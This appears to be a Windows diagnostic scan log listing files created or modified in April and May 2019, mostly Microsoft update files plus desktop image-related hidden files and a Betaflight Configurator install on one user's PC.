2019-05-15 10:04 - 2019-05-03 13:28 - 000089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2019-05-15 10:04 - 2019-05-03 13:27 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:26 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 004055040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 001471488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 08:43 - 000177128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2019-05-15 10:04 - 2019-05-03 08:36 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-15 10:04 - 2019-05-03 08:34 - 000159864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 005625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 001219896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 001027384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000709720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000568104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000063072 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000793640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000776784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000493880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000438984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000170296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000164664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 009084432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 007436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 002811192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 002771256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 001459328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001260480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 001141224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000983632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 000545808 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 000115728 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000434704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000384976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000192016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000146920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:19 - 006043712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000665224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000056288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 002258640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 001130568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:10 - 022017024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 08:05 - 022716416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 019401216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 004866048 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-05-15 10:04 - 2019-05-03 08:01 - 008189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 003400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 007593472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 005788672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 003710976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-05-15 10:04 - 2019-05-03 07:59 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 002175488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2019-05-15 10:04 - 2019-05-03 07:58 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2019-05-15 10:04 - 2019-05-03 07:57 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001560576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001295872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 005350912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 001803776 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 002166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-15 10:04 - 2019-05-03 07:55 - 000659968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 004929024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001097728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2019-05-15 10:04 - 2019-05-03 07:54 - 000961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-15 10:04 - 2019-05-03 07:54 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000535552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000507392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-05-15 10:04 - 2019-05-03 07:53 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2019-05-15 10:04 - 2019-05-03 06:38 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-05-15 10:04 - 2019-04-23 09:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-23 08:14 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-19 12:55 - 001634920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 12:54 - 000720200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-05-15 10:04 - 2019-04-19 12:40 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-05-15 10:04 - 2019-04-19 12:39 - 012754944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-05-15 10:04 - 2019-04-19 12:38 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-15 10:04 - 2019-04-19 12:38 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2019-05-15 10:04 - 2019-04-19 12:36 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-15 10:04 - 2019-04-19 12:34 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2019-05-15 10:04 - 2019-04-19 11:44 - 001454648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 11:37 - 000607960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-05-15 10:04 - 2019-04-19 11:30 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2019-05-15 10:04 - 2019-04-19 11:28 - 011940864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-15 10:04 - 2019-04-19 11:26 - 002405888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-05-15 10:04 - 2019-04-19 11:25 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2019-05-15 10:04 - 2019-04-19 07:07 - 000985400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:06 - 002571632 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000798520 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000713264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000274232 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-05-15 10:04 - 2019-04-19 07:02 - 000831800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:01 - 001982008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000581592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000576016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 06:43 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-15 10:04 - 2019-04-19 06:42 - 004384256 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetDriverInstall.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2019-05-15 10:04 - 2019-04-19 06:39 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000953856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000366080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 002909696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 001300992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000546816 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000186368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001175552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\system32\locale.nls
2019-05-15 10:04 - 2019-04-09 03:48 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-05-15 09:23 - 2019-05-15 09:23 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2yCh4fzygIE.jpg.uid-zps
2019-05-14 09:25 - 2019-05-14 09:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\co-tak-corgon.jpg.uid-zps
2019-05-13 15:14 - 2019-05-13 15:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\d22d77da76be5eb9d79e590bd0860881.jpg.uid-zps
2019-05-13 09:32 - 2019-05-13 09:32 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59883181_270092247114057_4655140165361074176_n.jpg.uid-zps
2019-05-13 09:28 - 2019-05-13 09:28 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez y jtfjfy.png.uid-zps
2019-05-10 13:01 - 2019-05-10 13:01 - 000000000 _____ C:\Users\TATTOO NR\Desktop\Nový textový dokument.txt
2019-05-09 19:52 - 2019-05-09 19:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\cover.jpg.uid-zps
2019-05-09 16:54 - 2019-06-10 09:36 - 000001405 _____ C:\Users\TATTOO NR\Desktop\Betaflight Configurator.lnk
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Betaflight
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\betaflight-configurator
2019-05-09 16:52 - 2019-05-09 16:52 - 000000000 ____D C:\Program Files (x86)\Betaflight
2019-05-09 16:47 - 2019-05-09 16:51 - 082048670 _____ C:\Users\TATTOO NR\Downloads\betaflight-configurator-installer_10.5.1_win32.exe
2019-05-09 09:00 - 2019-05-09 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\50333866_229676244575384_4473366742688595968_n.jpg.uid-zps
2019-05-07 13:35 - 2019-05-07 13:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59848646_430756721048088_676545310050222080_n.jpg.uid-zps
2019-05-07 12:34 - 2019-05-07 12:34 - 000000000 ____D C:\ProgramData\HP
2019-05-06 14:59 - 2019-05-06 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59713434_1280090952139411_7822264906450731008_n.jpg.uid-zps
2019-05-06 09:19 - 2019-05-06 09:19 - 000000110 ____H C:\Users\TATTOO NR\Desktop\a12_angel_by_articmoonsky-d2zou38.jpg.uid-zps
2019-04-30 09:00 - 2019-04-30 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56887114_350001178976974_3740757377687748608_n.jpg.uid-zps
2019-04-30 08:56 - 2019-04-30 08:56 - 000000110 ____H C:\Users\TATTOO NR\Desktop\90496b7ad5fe39781948a4f4ff367237.jpg.uid-zps
2019-04-19 09:03 - 2019-04-19 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\-xhb5PQiQ0mLryhp08uEkQ.jpg.uid-zps
2019-04-19 09:00 - 2019-04-19 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2895683.jpg.uid-zps
2019-04-18 09:13 - 2019-04-18 09:13 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48406988_212477236353110_4123837596855959552_n.jpg.uid-zps
2019-04-16 09:29 - 2019-04-16 09:29 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53347565_772680483131945_3388894015913984000_n.jpg.uid-zps
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\PUSH Entertainment
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\ProgramData\PUSH Entertainment
2019-04-15 09:44 - 2019-04-15 09:44 - 000000110 ____H C:\Users\TATTOO NR\Desktop\mandala-lotus-designs-lotus-flower-tattoo-design-on-tatted-up.jpg.uid-zps
2019-04-12 09:02 - 2019-04-12 09:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\636644945194563959.png.uid-zps
2019-04-12 08:57 - 2019-04-12 08:57 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Symbolic-Decals-Triple-Horn-Of-Odin-Decal-Sticker-Vinyl-Decal-Sticker__15659.1506198913.jpg.uid-zps
2019-04-11 14:55 - 2019-04-11 14:55 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53894691_2631269396912723_7807712191452282880_n.jpg.uid-zps
2019-04-11 09:40 - 2019-04-11 09:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\dac9b1d1cfdc928a754c623a4080eec0.jpg.uid-zps
2019-04-11 09:15 - 2019-04-11 09:15 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngyv5rvyw.png.uid-zps
2019-04-11 09:10 - 2019-04-11 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\49947531_363112507834625_4661429401936723968_n.jpg.uid-zps
